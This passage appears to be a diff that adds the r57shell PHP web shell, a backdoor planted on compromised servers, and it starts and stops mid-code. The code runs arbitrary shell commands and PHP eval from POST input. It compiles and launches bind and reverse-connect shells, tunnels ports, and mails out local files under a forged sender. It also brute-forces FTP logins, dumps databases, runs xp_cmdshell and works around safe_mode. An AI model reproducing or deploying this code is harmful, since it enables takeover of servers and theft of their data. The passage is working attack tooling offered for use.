+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." 
<a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; 
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' 
)'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); + mr($language,$res); + $_POST['cmd']=""; + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + mr($language,$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' 
-name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } 
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + @fwrite($file,$_POST['e_text']); + @fclose($file); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." 
&"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." 
&"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." 
-o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." 
|| $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! 
Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." 
- success\r\n"; $suc++; } }
+ @ftp_close($connection);
+ }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+ {
+ $res=@mysql_query("SHOW DATABASES", $db);
+ while(($row=@mysql_fetch_row($res)))
+ {
+ echo "[+] ".$row[0]."\r\n";
+ if(isset($_POST['st'])){
+ $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+ while(($row2=@mysql_fetch_row($res2)))
+ {
+ echo " | - ".$row2[0]."\r\n";
+ if(isset($_POST['sc']))
+ {
+ $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+ while(($row3=@mysql_fetch_row($res3))) { echo " | - ".$row3[0]."\r\n"; }
+ }
+ }
+ }
+ }
+ @mysql_close($db);
+ }
+ else echo "[-] ERROR!
Can't connect to MySQL server";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+ {
+ $res=@mssql_query("sp_databases", $db);
+ while(($row=@mssql_fetch_row($res)))
+ {
+ echo "[+] ".$row[0]."\r\n";
+ if(isset($_POST['st'])){
+ @mssql_select_db($row[0]);
+ $res2 = @mssql_query("sp_tables",$db);
+ while(($row2=@mssql_fetch_array($res2)))
+ {
+ if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+ {
+ echo " | - ".$row2['TABLE_NAME']."\r\n";
+ if(isset($_POST['sc']))
+ {
+ $res3 = @mssql_query("sp_columns ".$row2[2],$db);
+ while(($row3=@mssql_fetch_array($res3))) { echo " | - ".$row3['COLUMN_NAME']."\r\n"; }
+ }
+ }
+ }
+ }
+ }
+ @mssql_close($db);
+ }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+ $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+ $db = @pg_connect($str);
+ if($db)
+ {
+ $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+ while(($row=@pg_fetch_row($res)))
+ {
+ echo "[+] ".$row[0]."\r\n";
+ }
+ @pg_close($db);
+ }
+ else echo "[-] ERROR!
Can't connect to PostgreSQL server";
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+ if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+ if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+ $sqh = "# homepage: http://rst.void.ru\r\n";
+ $sqh .= "# ---------------------------------\r\n";
+ $sqh .= "# date : ".date ("j F Y g:i")."\r\n";
+ $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+ $sqh .= "# table : ".$_POST['mysql_tbl']."\r\n";
+ $sqh .= "# ---------------------------------\r\n\r\n";
+ switch($_POST['db']){
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+ {
+ if(@mysql_select_db($_POST['mysql_db'],$db))
+ {
+ $sql1 = "# MySQL dump created by r57shell\r\n";
+ $sql1 .= $sqh;
+ $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+ $row = @mysql_fetch_row($res);
+ $sql1 .= $row[1]."\r\n\r\n";
+ $sql1 .= "# ---------------------------------\r\n\r\n";
+ $sql2 = '';
+ $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+ if (@mysql_num_rows($res) > 0) {
+ while (($row = @mysql_fetch_assoc($res))) {
+ $keys = @implode("`, `", @array_keys($row));
+ $values = @array_values($row);
+ foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+ $values = @implode("', '", $values);
+ $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+ }
+ $sql2 .= "\r\n# ---------------------------------";
+ }
+ if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+ else { echo $sql1.$sql2; }
+ }
+ else echo "[-] ERROR! Can't select database";
+ @mysql_close($db);
+ }
+ else echo "[-] ERROR!
Can't connect to MySQL server";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+ {
+ if(@mssql_select_db($_POST['mysql_db'],$db))
+ {
+ $sql1 = "# MSSQL dump created by r57shell\r\n";
+ $sql1 .= $sqh;
+ $sql2 = '';
+ $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+ if (@mssql_num_rows($res) > 0) {
+ while (($row = @mssql_fetch_assoc($res))) {
+ $keys = @implode(", ", @array_keys($row));
+ $values = @array_values($row);
+ foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+ $values = @implode("', '", $values);
+ $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+ }
+ $sql2 .= "\r\n# ---------------------------------";
+ }
+ if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+ else { echo $sql1.$sql2; }
+ }
+ else echo "[-] ERROR! Can't select database";
+ @mssql_close($db);
+ }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+ $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+ $db = @pg_connect($str);
+ if($db)
+ {
+ $sql1 = "# PostgreSQL dump created by r57shell\r\n";
+ $sql1 .= $sqh;
+ $sql2 = '';
+ $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+ if (@pg_num_rows($res) > 0) {
+ while (($row = @pg_fetch_assoc($res))) {
+ $keys = @implode(", ", @array_keys($row));
+ $values = @array_values($row);
+ foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+ $values = @implode("', '", $values);
+ $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']."
(".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+ }
+ $sql2 .= "\r\n# ---------------------------------";
+ }
+ if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+ else { echo $sql1.$sql2; }
+ @pg_close($db);
+ }
+ else echo "[-] ERROR! Can't connect to PostgreSQL server";
+ break;
+ }
+ }
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function up_down($id)
+ {
+ global $lang;
+ global $language;
+ return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">';
+ }
+function div($id)
+ {
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;
+echo
